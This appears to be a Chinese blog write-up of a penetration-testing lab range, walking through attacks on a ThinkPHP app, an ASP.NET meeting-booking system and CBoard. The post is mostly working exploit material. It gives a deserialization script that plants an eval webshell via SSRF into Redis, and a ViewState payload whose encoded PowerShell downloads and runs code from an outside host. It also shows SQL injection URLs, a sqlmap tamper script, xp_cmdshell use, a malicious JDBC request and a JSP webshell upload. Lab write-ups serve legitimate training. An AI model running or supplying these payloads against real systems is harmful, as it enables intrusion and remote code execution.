新春考核靶场

已于 2024-02-01 14:24:44 修改
阅读量944 收藏 24
点赞数 24
文章标签: asp.net java php web安全
于 2024-02-01 14:21:37 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_35607078/article/details/135973118
版权

thinkphp


参考:https://xz.aliyun.com/t/7594

redis缓存

think_serialize: 开头的value通过get获取会触发 反序列化


脚本编写过程
先将生成的反序列化payload取反(取反是为了防止在传输过程中发生报错),由于get请求的长度限制遂将他分段传输,利用redis的APPEND命令不断的追加,待追加完成之后用bitop:not再次取反 即可得到完整的反序列化数据

一键利用脚本如下
反序列化poc 用 phpggc即可生成

<?php  
  
// eval 1  > payload123123.php  
$a= "think_serialize:";  
$a = $a."O%3A27%3A%22think%5Cprocess%5Cpipes%5CWindows%22%3A1%3A%7Bs%3A34%3A%22%00think%5Cprocess%5Cpipes%5CWindows%00files%22%3Ba%3A1%3A%7Bi%3A0%3BO%3A17%3A%22think%5Cmodel%5CPivot%22%3A5%3A%7Bs%3A9%3A%22%00%2A%00append%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A8%3A%22getError%22%3B%7Ds%3A8%3A%22%00%2A%00error%22%3BO%3A27%3A%22think%5Cmodel%5Crelation%5CHasOne%22%3A3%3A%7Bs%3A15%3A%22%00%2A%00selfRelation%22%3Bb%3A0%3Bs%3A8%3A%22%00%2A%00query%22%3BO%3A14%3A%22think%5Cdb%5CQuery%22%3A1%3A%7Bs%3A8%3A%22%00%2A%00model%22%3BO%3A20%3A%22think%5Cconsole%5COutput%22%3A2%3A%7Bs%3A28%3A%22%00think%5Cconsole%5COutput%00handle%22%3BO%3A30%3A%22think%5Csession%5Cdriver%5CMemcached%22%3A2%3A%7Bs%3A10%3A%22%00%2A%00handler%22%3BO%3A27%3A%22think%5Ccache%5Cdriver%5CMemcache%22%3A3%3A%7Bs%3A10%3A%22%00%2A%00options%22%3Ba%3A5%3A%7Bs%3A6%3A%22expire%22%3Bi%3A0%3Bs%3A12%3A%22cache_subdir%22%3Bb%3A0%3Bs%3A6%3A%22prefix%22%3Bs%3A0%3A%22%22%3Bs%3A4%3A%22path%22%3Bs%3A0%3A%22%22%3Bs%3A13%3A%22data_compress%22%3Bb%3A0%3B%7Ds%3A10%3A%22%00%2A%00handler%22%3BO%3A13%3A%22think%5CRequest%22%3A2%3A%7Bs%3A6%3A%22%00%2A%00get%22%3Ba%3A1%3A%7Bs%3A18%3A%22HEXENS%3CgetAttr%3Eno%3C%22%3Bs%3A53%3A%22echo+%22%3C%3Fphp+%40eval%28%5C%24_POST%5B1%5D%29%3B%3F%3E%22+%3E+payload123123.php%22%3B%7Ds%3A9%3A%22%00%2A%00filter%22%3Bs%3A6%3A%22system%22%3B%7Ds%3A6%3A%22%00%2A%00tag%22%3Bb%3A1%3B%7Ds%3A9%3A%22%00%2A%00config%22%3Ba%3A7%3A%7Bs%3A4%3A%22host%22%3Bs%3A9%3A%22127.0.0.1%22%3Bs%3A4%3A%22port%22%3Bi%3A11211%3Bs%3A6%3A%22expire%22%3Bi%3A3600%3Bs%3A7%3A%22timeout%22%3Bi%3A0%3Bs%3A12%3A%22session_name%22%3Bs%3A6%3A%22HEXENS%22%3Bs%3A8%3A%22username%22%3Bs%3A0%3A%22%22%3Bs%3A8%3A%22password%22%3Bs%3A0%3A%22%22%3B%7D%7Ds%3A9%3A%22%00%2A%00styles%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A7%3A%22getAttr%22%3B%7D%7D%7Ds%3A11%3A%22%00%2A%00bindAttr%22%3Ba%3A2%3A%7Bi%3A0%3Bs%3A2%3A%22no%22%3Bi%3A1%3Bs%3A3%3A%22123%22%3B%7D%7Ds%3A9%3A%22%00%2A%00parent%22%3BO%3A20%3A%22think%5Cconsole%5COutput%22%3A2%3A%7Bs%3A28%3A%22%00think%5Cconsole%5COutput%00handle%22%3BO%3A30%3A%22think%5Csession%5Cdriver%5CMemcached%22%3A2%3A%7Bs%3A10%3A%22%00%2A%00handler%22%3BO%3A27%3A%22think%5Ccache%5Cdriver%5CMemcache%22%3A3%3A%7Bs%3A10%3A%22%00%2A%00options%22%3Ba%3A5%3A%7Bs%3A6%3A%22expire%22%3Bi%3A0%3Bs%3A12%3A%22cache_subdir%22%3Bb%3A0%3Bs%3A6%3A%22prefix%22%3Bs%3A0%3A%22%22%3Bs%3A4%3A%22path%22%3Bs%3A0%3A%22%22%3Bs%3A13%3A%22data_compress%22%3Bb%3A0%3B%7Ds%3A10%3A%22%00%2A%00handler%22%3BO%3A13%3A%22think%5CRequest%22%3A2%3A%7Bs%3A6%3A%22%00%2A%00get%22%3Ba%3A1%3A%7Bs%3A18%3A%22HEXENS%3CgetAttr%3Eno%3C%22%3Bs%3A53%3A%22echo+%22%3C%3Fphp+%40eval%28%5C%24_POST%5B1%5D%29%3B%3F%3E%22+%3E+payload123123.php%22%3B%7Ds%3A9%3A%22%00%2A%00filter%22%3Bs%3A6%3A%22system%22%3B%7Ds%3A6%3A%22%00%2A%00tag%22%3Bb%3A1%3B%7Ds%3A9%3A%22%00%2A%00config%22%3Ba%3A7%3A%7Bs%3A4%3A%22host%22%3Bs%3A9%3A%22127.0.0.1%22%3Bs%3A4%3A%22port%22%3Bi%3A11211%3Bs%3A6%3A%22expire%22%3Bi%3A3600%3Bs%3A7%3A%22timeout%22%3Bi%3A0%3Bs%3A12%3A%22session_name%22%3Bs%3A6%3A%22HEXENS%22%3Bs%3A8%3A%22username%22%3Bs%3A0%3A%22%22%3Bs%3A8%3A%22password%22%3Bs%3A0%3A%22%22%3B%7D%7Ds%3A9%3A%22%00%2A%00styles%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A7%3A%22getAttr%22%3B%7D%7Ds%3A15%3A%22%00%2A%00selfRelation%22%3Bb%3A0%3Bs%3A8%3A%22%00%2A%00query%22%3BO%3A14%3A%22think%5Cdb%5CQuery%22%3A1%3A%7Bs%3A8%3A%22%00%2A%00model%22%3BO%3A20%3A%22think%5Cconsole%5COutput%22%3A2%3A%7Bs%3A28%3A%22%00think%5Cconsole%5COutput%00handle%22%3BO%3A30%3A%22think%5Csession%5Cdriver%5CMemcached%22%3A2%3A%7Bs%3A10%3A%22%00%2A%00handler%22%3BO%3A27%3A%22think%5Ccache%5Cdriver%5CMemcache%22%3A3%3A%7Bs%3A10%3A%22%00%2A%00options%22%3Ba%3A5%3A%7Bs%3A6%3A%22expire%22%3Bi%3A0%3Bs%3A12%3A%22cache_subdir%22%3Bb%3A0%3Bs%3A6%3A%22prefix%22%3Bs%3A0%3A%22%22%3Bs%3A4%3A%22path%22%3Bs%3A0%3A%22%22%3Bs%3A13%3A%22data_compress%22%3Bb%3A0%3B%7Ds%3A10%3A%22%00%2A%00handler%22%3BO%3A13%3A%22think%5CRequest%22%3A2%3A%7Bs%3A6%3A%22%00%2A%00get%22%3Ba%3A1%3A%7Bs%3A18%3A%22HEXENS%3CgetAttr%3Eno%3C%22%3Bs%3A53%3A%22echo+%22%3C%3Fphp+%40eval%28%5C%24_POST%5B1%5D%29%3B%3F%3E%22+%3E+payload123123.php%22%3B%7Ds%3A9%3A%22%00%2A%00filter%22%3Bs%3A6%3A%22system%22%3B%7Ds%3A6%3A%22%00%2A%00tag%22%3Bb%3A1%3B%7Ds%3A9%3A%22%00%2A%00config%22%3Ba%3A7%3A%7Bs%3A4%3A%22host%22%3Bs%3A9%3A%22127.0.0.1%22%3Bs%3A4%3A%22port%22%3Bi%3A11211%3Bs%3A6%3A%22expire%22%3Bi%3A3600%3Bs%3A7%3A%22timeout%22%3Bi%3A0%3Bs%3A12%3A%22session_name%22%3Bs%3A6%3A%22HEXENS%22%3Bs%3A8%3A%22username%22%3Bs%3A0%3A%22%22%3Bs%3A8%3A%22password%22%3Bs%3A0%3A%22%22%3B%7D%7Ds%3A9%3A%22%00%2A%00styles%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A7%3A%22getAttr%22%3B%7D%7D%7D%7D%7D%7D";  
  
$originalString = urldecode($a);  
$reversedString = '';  
  
for ($i = 0; $i < strlen($originalString); $i++) {  
    $reversedString .= $originalString[$i] ^ "\xFF";  
}  
$length = ceil(strlen($reversedString) / 10);  
  
$segments = str_split($reversedString, $length);  
$tmp_key = bin2hex(random_bytes(8));  
$redis_ip = "127.0.0.1";  
$server_ip = "103.164.63.172:8081";  
  
$url = "http://$server_ip/public/index.php?s=index/Index/geturl&url=dict://$redis_ip:6379/config:set:slave-read-only:no";  
echo file_get_contents($url);  
foreach ($segments as $value)  
{  
    $url = "http://$server_ip/public/index.php?s=index/Index/geturl&url=dict://$redis_ip:6379/APPEND:$tmp_key:".$value;  
    echo file_get_contents($url);  
}  
$url = "http://$server_ip/public/index.php?s=index/Index/geturl&url=dict://$redis_ip:6379/bitop:not:payload12xx123:$tmp_key";  
echo file_get_contents($url);  
  
echo file_get_contents("http://$server_ip/public/index.php?s=index/Index/getname&name=payload12xx123");  
  
echo "webshell:\npass:1\nhttp://$server_ip/public/payload123123.php";  
  
?>


在根目录下即可找到flag

会议预定系统

http://103.164.63.231/login.aspx 会议预定系统

前台viewstate反序列化

参考:
https://blog.csdn.net/qq_41891666/article/details/107290131
https://www.websecuritys.cn/index.php/archives/94/

能够在login.aspx出观察到 他的隐藏域

如下

网上熟悉了下打法之后,发现直接用ysoserial.net就能进行攻击
运行 ./ysoserial.exe -p ViewState也会给你常用的用法

在结合网上下载的源码的web.config,从中获取decryptionkeyvalidationkey 即可完成整个payload构造

./ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "powershell.exe -NonI -W Hidden -NoP -Exec Bypass -Enc cABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACAALQBuAG8AcAAgAC0AdwAgAGgAaQBkAGQAZQBuACAALQBjACAAIgBJAEUAWAAgACgAKABuAGUAdwAtAG8AYgBqAGUAYwB0ACAAbgBlAHQALgB3AGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADEANwA1AC4AMQA3ADgALgA3ADMALgAxADQAMQA6ADgAMAAxADEALwBhADEAMQAxACcAKQApACIA" --path="/login.aspx" --apppath="/" -decryptionkey="215D97F766DE50E575496E01C16306C751376E2EBBDE4B51" -validationkey="0BF11533BC55065E2C46C2F295FC5A501A13B28FE43B6F56E57973D4BE818354D21B7102EC24DB26B803D65936A5F1D812158D8F729406C168FC8440B4CDE16B"   --islegacy


随后便能直接上线,
然后在土豆提权,在administrator下即可获取到flag

前台注入点1


这个点就是传进来的dt未进行任何过滤我们构造**')** 进行闭合即可 触发sqli
利用

http://103.164.63.231/report/data_list.aspx?dt=2024-01-27%27);waitfor delay '0:0:5'--

可以直接堆叠

前台注入点2


这个点从cookie中获取了值,先进行了一个Helper.SimpleDecryptStr 简单的解密

能够发现,这就是个简单的字符串变换
我们可以编写tamper脚本很轻松的实现注入
脚本如下

from lib.core.enums import PRIORITY  
from lib.core.common import singleTimeWarnMessage  
from urllib.parse import quote  
  
  
__priority__ = PRIORITY.LOWEST  
  
  
  
def dependencies():  
    singleTimeWarnMessage("此脚本仅适用于 book_meeting")
  
def simple_encrypt_str(rs):  
    by = [ord(char) + 1 for char in rs]  
    encrypted_str = ''.join(chr(byte) for byte in reversed(by))  
    return encrypted_str  
  
  
def tamper(payload, **kwargs):  
    return quote(simple_encrypt_str(payload))

sqlmap -u "http://103.164.63.231/wx/AutoLogin_Qywx.aspx" --level 3 --cookie="qywxusername=1" -p qywxusername --tamper=book_meeting_AutoLogin_Qywx.py -
-ignore-redirects --skip-urlencode

前台注入点3


这个位置和之前的一致,都是对传入的值进行了简单的加密,利用方式与上面的一直
位置位于

/dd/AutoLogin.aspx

站库分离

因为存在堆叠注入,可以直接使用 xp_cmdshell 执行系统命令,通过 sqlmap --os–shell可以一键利用
然后在上线cs,最后可以在users下面即可获取到flag

CBoard

http://103.164.63.172:8090
admin root123默认口令进后台

jdbc 反弹shell


从GitHub上获取的源码,其中pom.xml如下 我们得知了数据库的版本,并且很有可能可以打CC6 用项目:https://github.com/fnmsd/MySQL_Fake_Server 构建evil server
最后http raw如下

POST /dashboard/test.do HTTP/1.1
Host: 103.164.63.172:8090
Content-Length: 403
Accept: application/json, text/plain, */*
DNT: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Origin: http://39.101.184.7:8026
Referer: http://39.101.184.7:8026/cboard/starter.html
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,vi;q=0.7
Cookie: JSESSIONID=351888835121736C4B575BE0B49F2DDA
Connection: close

datasource=%7B%22config%22%3A%7B%22pooled%22%3Atrue%2C%22driver%22%3A%22com.mysql.jdbc.Driver%22%2C%22jdbcurl%22%3A%22jdbc%3Amysql%3A%2F%2F175.178.73.141%3A3306%2Ftest%3FautoDeserialize%3Dtrue%26user%3Dbase64ZGVzZXJfQ0MzMV9pZA%3D%3D%22%2C%22username%22%3A%22CommonsCollections6%22%2C%22password%22%3A%22123456%22%7D%2C%22type%22%3A%22jdbc%22%2C%22name%22%3A%22test%22%7D&query=%7B%22sql%22%3A%221%22%7D

后台任意文件上传

还有一处能够进行任意文件上传

可以从上面源码看到,整个上传过程就是简单的拼接,并未对文件的后缀进行任何的处理,目标环境中间件是Tomcat,这就导致了我们可以上传任意的jsp webshell,从而获取网站的权限

http raw如下

POST /dashboard/uploadImage.do HTTP/1.1
Host: 103.164.63.172:8090
Pragma: no-cache
Cache-Control: no-cache
DNT: 1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,vi;q=0.7
Cookie: JSESSIONID=FBC699B01EC74F0154B6ECF2EF00953B
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryY32jx5xlw76vxXzj
Content-Length: 181

------WebKitFormBoundaryY32jx5xlw76vxXzj
Content-Disposition: form-data; name="file"; filename="2.jsp"
Content-Type: image/png


1
------WebKitFormBoundaryY32jx5xlw76vxXzj--

最后可以从源码中获取完整的拼接路径

http://103.164.63.172:8090/imgs/cockpit/upload/20240128104846/2.jsp

NaNN!
关注
  • 24
    点赞
  • 24
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
HTML新春烟花盛宴
兔子王
05-21 7万+
本期小编给大家分享一场绝美的烟花盛宴,无论你用手机还是电脑都可以直接打开哦!烟花盛宴春节放烟花这个传统习俗,可是咱们古老文化中一道璀璨夺目的风景线呢!每年农历新年的到来,家家户户燃放烟花炮竹的场景,那可是热闹非凡,充满了喜庆与吉祥的气息。这习俗最早源于古代人们对新的一年的美好祝愿和对邪恶力量的驱赶。在很久很久以前,人们相信燃烧火把和竹子可以发出巨大的声响和耀眼的火花,这些都能帮助他们赶走那些可能带来病痛和灾难的瘟疫、邪灵。后来随着技术的发展,竹子内的火药被发明出来,就演变成了我们现在看到的烟花爆竹。
SQL Server的WAITFOR DELAY注入
weixin_30906701的博客
07-09 519
1、waitfor用法介绍 功能:指定触发语句块、存储过程或事务执行的时间、时间间隔或事件。 语法:WAITFOR { DELAY 'time' | TIME 'time' } 参数:   DELAY:指等过了指定的时间过去后再执行SQL。   TIME:指等到了指定的时间点后再执行SQL。   'time':要等待的时间。可以按 datetime 数据可接受的格式指定 ...
thinkphp config文件将array serialize处理的区别
莫冲的专栏
03-28 932
在config.php中定义array类型的常量,若需要将数组serialize序列化,则需要这样写 'ERROR_CODE'=>serialize(array(     // Client Error 4xx     400 => 'Bad Request',     401 => 'Unauthorized',     ... )), 在使用时用 $ERROR_COEDE = unseri
tp5下redis 封装的类库
小小浮夸的博客
11-05 2750
&lt;?php // +---------------------------------------------------------------------- // | ThinkPHP [ WE CAN DO IT JUST THINK ] // +---------------------------------------------------------------------...
ThinkPHP系统变量,常量,序列化,反序列化,缓存
W1365966490的专栏
05-29 6392
变量的输出: 在模板中输出一个变量有两种形式:{$list.name} {$list[‘name’]} 在模板中可以使用系统变量,以$Think.开头    系统变量:(举例选几个)    获得服务器的IP地址:{$Think.server.SERVER_ADDR}    获得外部访问的IP地址:{$Think.server.REMOTE_ADDR}    获得服务器的名称:{$Thi
Python新春烟花盛宴
热门推荐
兔子王
02-04 2万+
Python呈现新春烟花盛宴。
支付宝17年新春红包技术体系剖析
蚂蚁金服技术团队
03-13 1518
017年支付宝五福红包红包开奖人数是167966715人(约1.68亿);除夕当天的参与人数是2.2亿;在业务峰值上,活页主页面峰值达到81W/s;扫福的峰值为22W/s;除夕当天的登录峰值为29W/s;除夕开奖峰值是90W/s。在本文中,蚂蚁金服技术专家天镜飞深入技术背后,为大家讲解了整体活动的稳定性保障、资损防控、运维部署、投产保障、监控管理、安全防护等方面的实战经验。 业务模式 今年支付宝...
html背景对联效果恭贺新春,恭贺新春的对联
weixin_35876760的博客
06-25 823
恭贺新春的对联春联作为一种独特的文学形式,在我国有着悠久的.历史。它从五代十国时开始,明清两代尤为兴盛,发展到今天已经有一千多年了。恭贺新春的对联(一)五湖四海皆春色 万水千山尽得辉 横批:万象更新喜居宝地千年旺 福照家门万事兴 横批:喜迎新春喜滋滋迎新年 笑盈盈辞旧岁 横批:喜迎新春天增岁月人增寿 春满乾坤福满楼 横批:四季长安一帆风顺吉星到 万事如意福临门 横批:财源广进一帆风顺年年好 万事如...
新春
weixin_67022862的博客
02-13 210
新春》作家/罗光记春风吹拂花满楼,爆竹声声贺新秋。欢天喜地庆佳节,丰衣足食乐未休。红红火火闹新春,家家户户喜气稠。欢声笑语满天地,幸福安康到永久。
新春祝福PSD模板
09-03
【标题】"新春祝福PSD模板"所涉及的知识点主要集中在设计领域,特别是与图形设计软件Photoshop(PSD)的使用相关。在设计行业中,PSD模板是设计师们常用的一种工作工具,它包含了预设的设计元素、布局和图层结构,...
新春图标下载
07-24
新春图标下载】资源包包含了20个专为庆祝新年设计的图标,这些图标具有128x128像素的尺寸,适用于多种用途,包括网站设计、移动应用、桌面软件以及各种喜庆活动的视觉元素。PNG和ICO是两种常见的图标格式,各有其...
恭贺新春PSD模板
09-03
【标题】"恭贺新春PSD模板"是一个与设计相关的资源,主要面向的是需要制作新年庆祝素材的设计人员。PSD是Adobe Photoshop的文件格式,它允许设计师以分层的方式编辑图像,提供了高度的可定制性和专业级的设计能力。...
虎年贺岁新春模板
08-26
"虎年贺岁新春模板"这一标题和描述暗示了这是一个与新年庆祝活动相关的资源包,特别是针对中国传统的农历新年——虎年。这类模板通常包含设计元素,如虎的形象、春节的祝福语、红火的色彩等,用于制作贺卡、海报、...
《计算机网络》(第8版)第1章 概述 复习笔记
m0_70617423的博客
07-24 1032
计算机网络在信息时代中的作用 互联网概述 互联网的组成 计算机网络在我国的发展 计算机网络的类别 计算机网络的性能 计算机网络体系结构
J031_使用TCP协议支持与多个客户端同时通信
最新发布
lzn20161229的博客
08-03 186
使用TCP协议支持与多个客户端同时通信。
SpringBoot+Vue图书(图书借阅)管理系统-附项目源码与配套文档
m0_74283290的博客
08-03 602
本论文阐述了一套先进的图书管理系统的设计与实现,该系统采用Java语言,结合现代Web开发框架和技术,旨在为图书馆提供高效、灵活且用户友好的资源管理解决方案。系统利用Spring Boot框架为核心,整合MyBatis ORM工具,以及MySQL数据库,构建了一个高性能、可扩展的后端服务。前端界面则采用了Vue.js框架,以提供流畅的用户交互体验。论文首先进行了详尽的需求分析,确定了系统的核心功能,包括图书的添加、编辑、删除、查询,读者的注册、登录、个人信息管理,以及图书的借阅、归还、续借流程。
社区养老服务小程序的设计
Karen198的博客
07-31 525
管理员账户功能包括:系统首页,个人中心,用户管理,服务人员管理,服务产品管理,服务预约管理,服务状态管理,服务退订管理,活动管理,视频管理。主要技术:Java,Spring,mybatis,mysql,jquery,html。服务器:SpringBoot自带 apache tomcat。微信端账号功能包括:系统首页,服务产品,活动,视频,我的。JDK版本:Java JDK1.8。数据库可视化工具: navicat。数据库版本: mysql5.7。开发工具:IDEA(推荐)开发系统:Windows。
深入理解Java注解
weixin_55745942的博客
08-01 565
Java注解是用来描述程序元素(如类、方法、变量等)的一种机制。它们可以提供关于程序的补充信息,帮助编译器、框架或其他工具更好地理解和处理代码。注解通常以符号开头,后跟注解名称和可能的参数。要创建自定义注解,需要使用@interface关键字定义一个接口,并在接口中声明注解的属性。这个注解名为,可以被用来标记方法。它有一个名为value的属性,具有默认值"default"。
python烟花新春盛宴
02-09
Python烟花新春盛宴是一个由CSDN开发的Python编程活动,旨在庆祝中国传统新年。这个活动提供了一系列有趣的Python编程挑战和项目,让开发者们可以展示他们的编程技能和创造力。 在Python烟花新春盛宴中,你可以参与各种编程挑战,例如编写一个程序来模拟烟花爆炸的效果,或者设计一个交互式的烟花表演程序。你可以使用Python的图形库(如Pygame或Turtle)来实现这些挑战,并展示出令人惊叹的烟花效果。 此外,Python烟花新春盛宴还提供了一些教程和指南,帮助初学者入门Python编程,并了解如何使用Python创建炫酷的烟花效果。你可以学习如何使用循环、条件语句和函数等基本编程概念来实现这些效果。 参与Python烟花新春盛宴不仅可以锻炼你的编程技能,还可以与其他开发者交流和分享经验。你可以在CSDN的论坛或社区中与其他参与者讨论问题、交流心得,并互相激励。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值